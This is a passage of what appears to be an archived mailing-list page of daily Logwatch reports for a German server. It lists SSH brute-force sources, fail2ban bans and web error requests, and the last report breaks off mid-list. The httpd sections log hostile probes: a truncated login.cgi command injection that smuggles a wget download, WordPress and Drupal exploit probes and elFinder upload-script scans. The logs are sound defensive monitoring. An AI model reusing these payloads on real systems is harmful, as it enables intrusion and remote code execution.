Dezember 2019 - TOPF

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Tue Dec 24 04:42:04 2019 Date Range Processed: yesterday ( 2019-Dec-23 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [162:164] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 3 sites probed the server 172.104.242.173 172.105.4.63 61.219.11.153 Requests with error response codes 400 Bad Request null: 8 Time(s) mstshash=Administr: 7 Time(s) mstshash=hello: 3 Time(s) /: 2 Time(s) /login.cgi?cli=aa%20aa%27;wget%20http://18 ... h%20/tmp/kh%27$: 1 Time(s) /nmaplowercheck1577100860: 1 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s) 9\x1A>\x9Ay$]\xD6E: 1 Time(s) J\x88\xB8\xFD\x0F\xA6\xD9\xB3\xD7BA\xAF\xF ... xBE\x00\xBD\xC0: 1 Time(s) [R\x5C\xEF\x98\x15I\xE7ck\x88\xA8B\xAC\x8C ... xAC\xEC\xE1\x93: 1 Time(s) \x08v: 1 Time(s) \x90\xE1\x0E\xF7@\x8D\x1B\xD6\xDE\xEC\x90\ ... xBE\x00\xBD\xC0: 1 Time(s) \x9E\xEB\xE7{\x99E\xE7\x8AF\xDB\xA1\x90*j^ ... xBE\x00\xBD\xC0: 1 Time(s) \xA6\x12\x97\xF4\x12\xD9\xE3.K\xBB\xD6\xAF ... xBE\x00\xBD\xC0: 1 Time(s) \xB3\x09a^\xD1: 1 Time(s) \xB4\xB66&: 1 Time(s) \xBBUn\xA7pM]\xDE\x09\x87\xDBXOY\xB1\xF9\x ... xBE\x00\xBD\xC0: 1 Time(s) \xC1Um\x9Cs\xE0.x\xA9\x9F\x01\x98\xCC\xB7\ ... xBE\x00\xBD\xC0: 1 Time(s) \xD4\x9C*\xFC\xDCc\xAEXiv\x12s)d7\xD3\x99@\xD6\x96M\x00!\xEB: 1 Time(s) \xE2\x994\xCBF`\xE3\x1B\x04kS\xEB: 1 Time(s) \xF6\xF15\x98\xA6#\x14S\x0F\xE7\xE0\x0C&\x ... xBE\x00\xBD\xC0: 1 Time(s) \xF7: 1 Time(s) \xF7\xFF\xA4T\x12\xB8: 1 Time(s) f\x0C\xCA\x98~\xE2/1\x04#\xED2\x04\x1D\xBA ... xBE\x00\xBD\xC0: 1 Time(s) x\xE2\xDD\x12\xD9\x90\xFB\xB6\xBA\xC0L\x17 ... x1F\xEA\x84\xFD: 1 Time(s) zapf.in: 1 Time(s) 403 Forbidden /resolutionen/sose17/gesellschaftlich_verantwortung/: 1 Time(s) 404 Not Found /robots.txt: 33 Time(s) /berlin/apple-touch-icon.png: 18 Time(s) /wp-login.php: 4 Time(s) //user/register/?element_parents=account/m ... mat=drupal_ajax: 2 Time(s) //webconfig.txt.php: 2 Time(s) //wp-admin/admin-post.php?swp_debug=load_o ... 20%22h1loo1%22;: 2 Time(s) //wp-admin/admin-post.php?swp_debug=load_o ... wpaa=phpinfo();: 2 Time(s) ////wp-login.php: 1 Time(s) /985yo1oz19idwrts: 1 Time(s) /berlin/,: 1 Time(s) /download/reader_hb02.pdf: 1 Time(s) /nndgo9b5n0l7fbxl: 1 Time(s) /sites/all/libraries/elfinder-1.2/elfinder.php.html: 1 Time(s) /sites/all/libraries/elfinder/__elfinder.php.html: 1 Time(s) /sites/all/libraries/elfinder/_elfinder.php.html: 1 Time(s) /sites/default/files/2009_WiSe_M%C3%BCnchen.pdf: 1 Time(s) /sites/default/files/2014_SoSe_Duesseldorf.pdf: 1 Time(s) /uefevysst4aoow3o: 1 Time(s) 405 Method Not Allowed /?q=user%2Fpassword&name%5B%23post_render% ... s%2Fvuln.php%27: 1 Time(s) 500 Internal Server Error /: 21 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (222.186.175.155): 57 Time(s) root (222.186.175.220): 52 Time(s) root (222.186.173.238): 36 Time(s) root (222.186.175.148): 36 Time(s) root (222.186.175.183): 36 Time(s) root (222.186.180.9): 36 Time(s) root (222.186.175.202): 35 Time(s) root (218.92.0.158): 29 Time(s) root (222.186.180.41): 29 Time(s) root (222.186.169.192): 28 Time(s) root (222.186.175.169): 24 Time(s) root (222.186.175.217): 24 Time(s) root (222.186.180.223): 24 Time(s) root (222.186.42.4): 24 Time(s) root (49.88.112.59): 24 Time(s) root (218.92.0.155): 23 Time(s) root (222.186.173.142): 23 Time(s) root (222.186.175.140): 23 Time(s) root (222.186.175.216): 23 Time(s) root (222.186.173.183): 22 Time(s) root (218.92.0.164): 18 Time(s) root (222.186.175.147): 18 Time(s) root (222.186.175.161): 18 Time(s) root (222.186.180.147): 18 Time(s) root (222.186.180.17): 18 Time(s) root (222.186.180.6): 18 Time(s) root (222.186.180.8): 18 Time(s) root (222.186.190.92): 18 Time(s) root (112.85.42.172): 16 Time(s) root (222.186.175.154): 15 Time(s) root (218.92.0.131): 12 Time(s) root (218.92.0.148): 12 Time(s) root (218.92.0.165): 12 Time(s) root (218.92.0.212): 12 Time(s) root (222.186.175.150): 12 Time(s) root (222.186.175.167): 12 Time(s) root (222.186.175.215): 12 Time(s) root (49.88.112.61): 12 Time(s) root (49.88.112.64): 12 Time(s) root (61.177.172.128): 12 Time(s) root (112.85.42.171): 11 Time(s) root (222.186.173.180): 11 Time(s) root (222.186.175.163): 11 Time(s) unknown (69.158.207.141): 11 Time(s) root (218.92.0.175): 10 Time(s) root (222.186.175.182): 10 Time(s) root (222.186.173.154): 7 Time(s) root (112.85.42.173): 6 Time(s) root (218.92.0.135): 6 Time(s) root (218.92.0.145): 6 Time(s) root (218.92.0.170): 6 Time(s) root (218.92.0.172): 6 Time(s) root (218.92.0.178): 6 Time(s) root (222.186.169.194): 6 Time(s) root (222.186.175.181): 6 Time(s) root (222.186.175.212): 6 Time(s) root (222.186.190.2): 6 Time(s) root (69.158.207.141): 6 Time(s) root (112.85.42.175): 5 Time(s) root (112.85.42.178): 5 Time(s) mysql (69.158.207.141): 2 Time(s) backup (113.176.89.116): 1 Time(s) backup (76.73.206.90): 1 Time(s) root (106.12.28.203): 1 Time(s) root (107.170.192.131): 1 Time(s) root (114.67.90.149): 1 Time(s) root (117.121.97.115): 1 Time(s) root (67.205.138.198): 1 Time(s) root (94.191.99.243): 1 Time(s) unknown (103.1.153.103): 1 Time(s) unknown (106.12.34.56): 1 Time(s) unknown (129.213.100.212): 1 Time(s) unknown (139.199.219.235): 1 Time(s) unknown (139.59.14.210): 1 Time(s) unknown (177.126.188.2): 1 Time(s) unknown (195.190.137.133): 1 Time(s) unknown (200.0.236.210): 1 Time(s) unknown (200.252.132.22): 1 Time(s) unknown (206.189.136.160): 1 Time(s) unknown (217.29.219.20): 1 Time(s) unknown (37.114.179.42): 1 Time(s) unknown (37.148.211.251): 1 Time(s) unknown (80.82.64.214): 1 Time(s) unknown (88.207.128.39): 1 Time(s) unknown (mx-ll-183.88.137-33.dynamic.3bb.co.th): 1 Time(s) unknown (static-dsl-24.87-197-126.telecom.sk): 1 Time(s) Invalid Users: Unknown Account: 28 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 11.628K Bytes accepted 11,907 11.628K Bytes sent via SMTP 11,907 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 1 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 1 Total 4xx Rejects 100.00% ======== ================================================== 1788 Connections 1733 Connections lost (inbound) 1788 Disconnections 1 Removed from queue 1 Sent via SMTP 11 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Network Read Write Errors: 1 Disconnecting after too many authentication failures for user: root : 172 Time(s) Failed logins from: 49.88.112.59: 24 times 49.88.112.61: 12 times 49.88.112.64: 12 times 61.177.172.128: 12 times 67.205.138.198: 1 time 69.158.207.141: 8 times 76.73.206.90 (circlorama.mybizpronetwork.net): 1 time 94.191.99.243: 1 time 106.12.28.203: 1 time 107.170.192.131: 1 time 112.85.42.171: 11 times 112.85.42.172: 16 times 112.85.42.173: 6 times 112.85.42.175: 5 times 112.85.42.178: 5 times 113.176.89.116 (static.vnpt.vn): 1 time 114.67.90.149: 1 time 117.121.97.115: 1 time 218.92.0.131: 12 times 218.92.0.135: 6 times 218.92.0.145: 6 times 218.92.0.148: 12 times 218.92.0.155: 23 times 218.92.0.158: 29 times 218.92.0.164: 18 times 218.92.0.165: 12 times 218.92.0.170: 6 times 218.92.0.172: 6 times 218.92.0.175: 10 times 218.92.0.178: 6 times 218.92.0.212: 12 times 222.186.42.4: 24 times 222.186.169.192: 28 times 222.186.169.194: 6 times 222.186.173.142: 24 times 222.186.173.154: 9 times 222.186.173.180: 11 times 222.186.173.183: 30 times 222.186.173.238: 36 times 222.186.175.140: 23 times 222.186.175.147: 18 times 222.186.175.148: 36 times 222.186.175.150: 12 times 222.186.175.154: 18 times 222.186.175.155: 60 times 222.186.175.161: 18 times 222.186.175.163: 11 times 222.186.175.167: 12 times 222.186.175.169: 24 times 222.186.175.181: 6 times 222.186.175.182: 10 times 222.186.175.183: 36 times 222.186.175.202: 35 times 222.186.175.212: 6 times 222.186.175.215: 12 times 222.186.175.216: 23 times 222.186.175.217: 24 times 222.186.175.220: 54 times 222.186.180.6: 18 times 222.186.180.8: 18 times 222.186.180.9: 36 times 222.186.180.17: 18 times 222.186.180.41: 29 times 222.186.180.147: 18 times 222.186.180.223: 24 times 222.186.190.2: 6 times 222.186.190.92: 18 times Illegal users from: undef: 26 times 37.114.179.42: 1 time 37.148.211.251 (mail.minerocean.com): 1 time 69.158.207.141: 11 times 80.82.64.214 (no-reverse-dns-configured.com): 1 time 87.197.126.24 (static-dsl-24.87-197-126.telecom.sk): 1 time 88.207.128.39: 1 time 103.1.153.103: 1 time 106.12.34.56: 1 time 129.213.100.212: 1 time 139.59.14.210: 1 time 139.199.219.235: 1 time 177.126.188.2 (2.188.126.177.static.sp2.alog.com.br): 1 time 183.88.137.33 (mx-ll-183.88.137-33.dynamic.3bb.co.th): 1 time 195.190.137.133: 1 time 200.0.236.210 (static-32.mdp.satlink.com): 1 time 200.252.132.22: 1 time 206.189.136.160: 1 time 217.29.219.20: 1 time **Unmatched Entries** fatal: no matching cipher found: client aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 6 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/vzfs 400G 241G 160G 61% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

5 Jahre, 9 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Mon Dec 23 04:42:03 2019 Date Range Processed: yesterday ( 2019-Dec-22 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [149:148] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 3 sites probed the server 172.104.242.173 45.56.78.64 61.219.11.153 Requests with error response codes 400 Bad Request mstshash=Administr: 5 Time(s) null: 4 Time(s) /: 1 Time(s) /setup.cgi?next_file=netgear.cfg&todo=sysc ... ntsetting.htm=1: 1 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s) 404 Not Found /robots.txt: 27 Time(s) /berlin/apple-touch-icon.png: 10 Time(s) /2019/wp-login.php: 1 Time(s) /berichte/WiSe14/Bericht_WiSe14-Bremen.pdf: 1 Time(s) /blog/wp-login.php: 1 Time(s) /resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 1 Time(s) /sites/default/files/2009_WiSe_M%C3%BCnchen.pdf: 1 Time(s) /sites/default/files/2014_SoSe_Duesseldorf.pdf: 1 Time(s) /sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s) /test/wp-login.php: 1 Time(s) /verein%7C: 1 Time(s) /wordpress/wp-login.php: 1 Time(s) /wp/wp-login.php: 1 Time(s) 500 Internal Server Error /: 4 Time(s) //login_sid.lua: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (222.186.175.169): 47 Time(s) root (222.186.180.41): 41 Time(s) root (222.186.180.9): 34 Time(s) root (222.186.180.17): 30 Time(s) root (222.186.180.223): 30 Time(s) root (222.186.175.167): 29 Time(s) root (222.186.175.163): 28 Time(s) root (218.92.0.170): 24 Time(s) root (222.186.169.192): 24 Time(s) root (222.186.169.194): 24 Time(s) root (222.186.173.180): 24 Time(s) root (222.186.173.183): 24 Time(s) root (222.186.175.140): 24 Time(s) root (222.186.175.161): 24 Time(s) root (222.186.175.220): 24 Time(s) root (222.186.190.92): 24 Time(s) root (218.92.0.175): 20 Time(s) root (218.92.0.164): 18 Time(s) root (218.92.0.212): 18 Time(s) root (222.186.173.154): 18 Time(s) root (222.186.173.238): 18 Time(s) root (222.186.175.148): 18 Time(s) root (222.186.175.181): 18 Time(s) root (222.186.175.183): 18 Time(s) root (222.186.175.202): 18 Time(s) root (222.186.180.6): 18 Time(s) root (49.88.112.59): 18 Time(s) root (49.88.112.64): 18 Time(s) root (222.186.175.151): 17 Time(s) root (222.186.175.182): 17 Time(s) root (222.186.180.8): 17 Time(s) root (222.186.175.150): 16 Time(s) root (222.186.190.2): 16 Time(s) root (218.92.0.134): 14 Time(s) root (218.92.0.179): 12 Time(s) root (222.186.173.142): 12 Time(s) root (222.186.173.215): 12 Time(s) root (222.186.175.155): 12 Time(s) root (222.186.175.215): 12 Time(s) root (222.186.180.147): 12 Time(s) root (218.92.0.148): 11 Time(s) root (222.186.175.212): 11 Time(s) root (112.85.42.172): 10 Time(s) root (112.85.42.176): 10 Time(s) root (218.92.0.165): 10 Time(s) root (222.186.173.226): 10 Time(s) root (49.88.112.61): 8 Time(s) root (112.85.42.175): 6 Time(s) root (112.85.42.181): 6 Time(s) root (218.92.0.131): 6 Time(s) root (218.92.0.141): 6 Time(s) root (218.92.0.158): 6 Time(s) root (218.92.0.178): 6 Time(s) root (222.186.175.147): 6 Time(s) root (222.186.175.154): 6 Time(s) root (222.186.175.217): 6 Time(s) root (222.186.42.4): 6 Time(s) root (49.88.112.55): 6 Time(s) root (49.88.112.62): 6 Time(s) root (112.85.42.173): 5 Time(s) root (112.85.42.174): 5 Time(s) root (112.85.42.182): 5 Time(s) root (61.177.172.128): 5 Time(s) unknown (198.98.54.28): 5 Time(s) unknown (27.78.14.83): 4 Time(s) unknown (bli06-1-78-195-108-27.fbx.proxad.net): 4 Time(s) unknown (27.78.12.22): 3 Time(s) unknown (047-027-132-008.res.spectrum.com): 2 Time(s) unknown (pool-72-68-125-94.nwrknj.fios.verizon.net): 2 Time(s) postgres (182.16.249.130): 1 Time(s) root (0000196.com): 1 Time(s) root (176.27.30.237): 1 Time(s) root (195.39.140.129): 1 Time(s) root (201.122.85.238): 1 Time(s) root (206.189.132.204): 1 Time(s) root (crushdigital.co.uk): 1 Time(s) unknown (0000196.com): 1 Time(s) unknown (103.57.210.12): 1 Time(s) unknown (113.174.78.142): 1 Time(s) unknown (115.254.63.52): 1 Time(s) unknown (118.69.55.61): 1 Time(s) unknown (119.42.175.200): 1 Time(s) unknown (128.246.211.130.bc.googleusercontent.com): 1 Time(s) unknown (14.116.187.107): 1 Time(s) unknown (152.0.12.103): 1 Time(s) unknown (156.223.208.45): 1 Time(s) unknown (162.ip-54-37-205.eu): 1 Time(s) unknown (174.138.56.93): 1 Time(s) unknown (92.63.194.26): 1 Time(s) unknown (nkym.com.ph): 1 Time(s) Invalid Users: Unknown Account: 34 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 9 Miscellaneous warnings 13.519K Bytes accepted 13,843 13.519K Bytes sent via SMTP 13,843 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 382 Connections 330 Connections lost (inbound) 382 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Timeouts (inbound) 6 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 170 Time(s) Failed logins from: 46.101.88.10 (crushdigital.co.uk): 1 time 49.88.112.55: 6 times 49.88.112.59: 18 times 49.88.112.61: 8 times 49.88.112.62: 6 times 49.88.112.64: 18 times 61.177.172.128: 5 times 112.85.42.172: 10 times 112.85.42.173: 5 times 112.85.42.174: 5 times 112.85.42.175: 6 times 112.85.42.176: 10 times 112.85.42.181: 6 times 112.85.42.182: 5 times 175.45.136.39 (0000196.com): 1 time 176.27.30.237 (b01b1eed.bb.sky.com): 1 time 182.16.249.130 (ip-182-16-249-130.bmkg.go.id): 1 time 195.39.140.129: 1 time 201.122.85.238 (dsl-201-122-85-238-sta.prod-empresarial.com.mx): 1 time 206.189.132.204: 1 time 218.92.0.131: 6 times 218.92.0.134: 17 times 218.92.0.141: 6 times 218.92.0.148: 11 times 218.92.0.158: 6 times 218.92.0.164: 18 times 218.92.0.165: 10 times 218.92.0.170: 24 times 218.92.0.175: 24 times 218.92.0.178: 6 times 218.92.0.179: 12 times 218.92.0.212: 18 times 222.186.42.4: 6 times 222.186.169.192: 24 times 222.186.169.194: 24 times 222.186.173.142: 12 times 222.186.173.154: 18 times 222.186.173.180: 24 times 222.186.173.183: 24 times 222.186.173.215: 12 times 222.186.173.226: 10 times 222.186.173.238: 18 times 222.186.175.140: 24 times 222.186.175.147: 6 times 222.186.175.148: 18 times 222.186.175.150: 16 times 222.186.175.151: 17 times 222.186.175.154: 6 times 222.186.175.155: 12 times 222.186.175.161: 24 times 222.186.175.163: 28 times 222.186.175.167: 29 times 222.186.175.169: 47 times 222.186.175.181: 18 times 222.186.175.182: 17 times 222.186.175.183: 18 times 222.186.175.202: 18 times 222.186.175.212: 11 times 222.186.175.215: 12 times 222.186.175.217: 6 times 222.186.175.220: 24 times 222.186.180.6: 18 times 222.186.180.8: 17 times 222.186.180.9: 36 times 222.186.180.17: 30 times 222.186.180.41: 41 times 222.186.180.147: 12 times 222.186.180.223: 30 times 222.186.190.2: 16 times 222.186.190.92: 24 times Illegal users from: undef: 18 times 14.116.187.107: 1 time 27.78.12.22 (localhost): 3 times 27.78.14.83 (localhost): 4 times 47.27.132.8 (047-027-132-008.res.spectrum.com): 2 times 54.37.205.162 (162.ip-54-37-205.eu): 1 time 72.68.125.94 (pool-72-68-125-94.nwrknj.fios.verizon.net): 2 times 78.195.108.27 (bli06-1-78-195-108-27.fbx.proxad.net): 4 times 92.63.194.26: 1 time 103.57.210.12 (mail.socialyze.asia): 1 time 113.174.78.142 (static.vnpt.vn): 1 time 115.254.63.52: 1 time 118.69.55.61: 1 time 119.42.175.200: 1 time 122.55.19.115 (nkym.com.ph): 1 time 130.211.246.128 (128.246.211.130.bc.googleusercontent.com): 1 time 139.162.122.110 (scan-8.security.ipip.net): 1 time 152.0.12.103 (103.12.0.152.d.dyn.claro.net.do): 1 time 156.223.208.45 (host-156.223.45.208-static.tedata.net): 1 time 174.138.56.93: 1 time 175.45.136.39 (0000196.com): 1 time 198.98.54.28: 5 times **Unmatched Entries** fatal: no matching cipher found: client aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 9 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/vzfs 400G 241G 160G 61% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

5 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sun Dec 22 04:42:04 2019 Date Range Processed: yesterday ( 2019-Dec-21 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [165:165] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 171.12.10.191 -> zapf.wiki:443: 1 Time(s) 60.191.52.254 -> zapf.wiki:443: 1 Time(s) A total of 2 sites probed the server 158.69.158.101 61.219.11.153 Requests with error response codes 400 Bad Request /: 13 Time(s) mstshash=Administr: 6 Time(s) null: 3 Time(s) zapf.wiki:443: 2 Time(s) /.git/HEAD: 1 Time(s) /favicon.ico: 1 Time(s) /robots.txt: 1 Time(s) 404 Not Found /robots.txt: 25 Time(s) /verei: 12 Time(s) /verein/kontak: 12 Time(s) /berlin/apple-touch-icon.png: 10 Time(s) /zapf/fachschafte: 8 Time(s) /zapf/reade: 8 Time(s) /zapf/resolutione: 8 Time(s) /zapf/studienfuehre: 8 Time(s) /home/zapf: 1 Time(s) /resolutionen/wise17/Akkreditierung_PosPap/Pospap_: 1 Time(s) /sites/all/libraries/elfinder/connectors/php/connector.php: 1 Time(s) /sites/all/libraries/elfinder/elfinder.html: 1 Time(s) /sites/all/libraries/elfinder/src/connecto ... p/connector.php: 1 Time(s) /sites/all/libraries/plupload/examples/upload.php: 1 Time(s) /wp-login.php: 1 Time(s) 500 Internal Server Error /: 100 Time(s) /robots.txt: 2 Time(s) //login_sid.lua: 1 Time(s) /ajax: 1 Time(s) /favicon.ico: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (222.186.175.148): 42 Time(s) root (222.186.175.140): 41 Time(s) root (222.186.175.220): 36 Time(s) root (222.186.180.9): 36 Time(s) root (49.88.112.62): 35 Time(s) root (222.186.173.226): 31 Time(s) root (218.92.0.212): 30 Time(s) root (222.186.175.147): 30 Time(s) root (222.186.175.182): 30 Time(s) root (222.186.175.216): 30 Time(s) root (222.186.169.194): 29 Time(s) root (222.186.175.155): 29 Time(s) root (222.186.173.238): 28 Time(s) root (222.186.175.169): 28 Time(s) root (218.92.0.179): 24 Time(s) root (49.88.112.59): 24 Time(s) root (222.186.173.154): 23 Time(s) root (218.92.0.145): 22 Time(s) root (218.92.0.170): 20 Time(s) root (222.186.175.161): 19 Time(s) root (218.92.0.148): 18 Time(s) root (218.92.0.165): 18 Time(s) root (222.186.169.192): 18 Time(s) root (222.186.173.180): 18 Time(s) root (222.186.175.217): 18 Time(s) root (222.186.173.142): 17 Time(s) root (222.186.175.150): 17 Time(s) root (222.186.175.215): 17 Time(s) unknown (69.158.207.141): 16 Time(s) root (218.92.0.134): 12 Time(s) root (218.92.0.164): 12 Time(s) root (218.92.0.178): 12 Time(s) root (222.186.173.183): 12 Time(s) root (222.186.175.154): 12 Time(s) root (222.186.175.163): 12 Time(s) root (222.186.175.167): 12 Time(s) root (222.186.175.183): 12 Time(s) root (222.186.175.202): 12 Time(s) root (222.186.175.212): 12 Time(s) root (222.186.180.17): 12 Time(s) root (222.186.180.41): 12 Time(s) root (222.186.180.6): 12 Time(s) root (222.186.180.8): 12 Time(s) root (222.186.190.2): 12 Time(s) root (222.186.42.4): 12 Time(s) root (49.88.112.55): 12 Time(s) root (49.88.112.61): 12 Time(s) root (69.158.207.141): 12 Time(s) root (218.92.0.135): 11 Time(s) root (112.85.42.173): 10 Time(s) root (218.92.0.175): 10 Time(s) root (112.85.42.181): 6 Time(s) root (218.92.0.131): 6 Time(s) root (222.186.173.215): 6 Time(s) root (222.186.175.151): 6 Time(s) root (222.186.175.181): 6 Time(s) root (222.186.180.147): 6 Time(s) root (49.88.112.64): 6 Time(s) root (112.85.42.174): 5 Time(s) root (218.92.0.155): 5 Time(s) root (218.92.0.172): 5 Time(s) root (222.186.180.223): 5 Time(s) mysql (69.158.207.141): 4 Time(s) root (61.177.172.128): 3 Time(s) unknown (218.88.164.159): 3 Time(s) unknown (80.82.64.214): 3 Time(s) unknown (24.229.156.211.res-cmts.sm.ptd.net): 2 Time(s) postgres (139.59.180.53): 1 Time(s) postgres (142.93.39.29): 1 Time(s) postgres (196.203.31.154): 1 Time(s) postgres (37.139.9.23): 1 Time(s) postgres (node-62k.pool-182-52.dynamic.totinternet.net): 1 Time(s) root (112.140.185.64): 1 Time(s) root (112.175.114.111): 1 Time(s) root (165.22.103.237): 1 Time(s) root (198.211.123.183): 1 Time(s) root (54.ip-54-39-21.net): 1 Time(s) root (78-57-162-165.static.zebra.lt): 1 Time(s) root (85.209.0.167): 1 Time(s) root (ns3143240.ip-51-77-246.eu): 1 Time(s) unknown (112.111.13.253): 1 Time(s) unknown (118.179.112.206): 1 Time(s) unknown (130.61.122.5): 1 Time(s) unknown (130.61.89.191): 1 Time(s) unknown (131.221.168.102): 1 Time(s) unknown (156.216.156.217): 1 Time(s) unknown (167.99.75.174): 1 Time(s) unknown (176.40.255.156): 1 Time(s) unknown (179.108.126.114): 1 Time(s) unknown (185.66.49.191): 1 Time(s) unknown (187.94.142.253): 1 Time(s) unknown (197.237.26.212): 1 Time(s) unknown (1ny88-1-78-233-121-149.fbx.proxad.net): 1 Time(s) unknown (213.194.139.0): 1 Time(s) unknown (36.66.188.183): 1 Time(s) unknown (54.ip-51-68-230.eu): 1 Time(s) unknown (78-22-13-155.access.telenet.be): 1 Time(s) unknown (93.84.86.69): 1 Time(s) unknown (96.56.82.194): 1 Time(s) unknown (cloud-io.cloud): 1 Time(s) unknown (ip182.ip-51-254-51.eu): 1 Time(s) unknown (s17783852.onlinehome-server.info): 1 Time(s) Invalid Users: Unknown Account: 46 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 19 Miscellaneous warnings 15.999K Bytes accepted 16,383 15.999K Bytes sent via SMTP 16,383 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 2 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 2 Total 4xx Rejects 100.00% ======== ================================================== 80 Connections 28 Connections lost (inbound) 80 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 175 Time(s) Failed logins from: 37.139.9.23: 1 time 49.88.112.55: 12 times 49.88.112.59: 24 times 49.88.112.61: 12 times 49.88.112.62: 35 times 49.88.112.64: 6 times 51.77.246.155 (ns3143240.ip-51-77-246.eu): 1 time 54.39.21.54 (54.ip-54-39-21.net): 1 time 61.177.172.128: 6 times 69.158.207.141: 16 times 78.57.162.165 (78-57-162-165.static.zebra.lt): 1 time 85.209.0.167: 1 time 112.85.42.173: 10 times 112.85.42.174: 5 times 112.85.42.181: 6 times 112.140.185.64: 1 time 112.175.114.111: 1 time 139.59.180.53: 1 time 142.93.39.29: 1 time 165.22.103.237: 1 time 182.52.30.188 (node-62k.pool-182-52.dynamic.totinternet.net): 1 time 196.203.31.154: 1 time 198.211.123.183: 1 time 218.92.0.131: 6 times 218.92.0.134: 12 times 218.92.0.135: 11 times 218.92.0.145: 24 times 218.92.0.148: 18 times 218.92.0.155: 5 times 218.92.0.164: 12 times 218.92.0.165: 18 times 218.92.0.170: 24 times 218.92.0.172: 5 times 218.92.0.175: 10 times 218.92.0.178: 12 times 218.92.0.179: 24 times 218.92.0.212: 30 times 222.186.42.4: 12 times 222.186.169.192: 18 times 222.186.169.194: 29 times 222.186.173.142: 17 times 222.186.173.154: 23 times 222.186.173.180: 18 times 222.186.173.183: 12 times 222.186.173.215: 6 times 222.186.173.226: 31 times 222.186.173.238: 30 times 222.186.175.140: 41 times 222.186.175.147: 30 times 222.186.175.148: 42 times 222.186.175.150: 17 times 222.186.175.151: 6 times 222.186.175.154: 12 times 222.186.175.155: 29 times 222.186.175.161: 19 times 222.186.175.163: 12 times 222.186.175.167: 12 times 222.186.175.169: 28 times 222.186.175.181: 6 times 222.186.175.182: 30 times 222.186.175.183: 12 times 222.186.175.202: 12 times 222.186.175.212: 12 times 222.186.175.215: 17 times 222.186.175.216: 30 times 222.186.175.217: 18 times 222.186.175.220: 36 times 222.186.180.6: 12 times 222.186.180.8: 12 times 222.186.180.9: 36 times 222.186.180.17: 12 times 222.186.180.41: 12 times 222.186.180.147: 6 times 222.186.180.223: 5 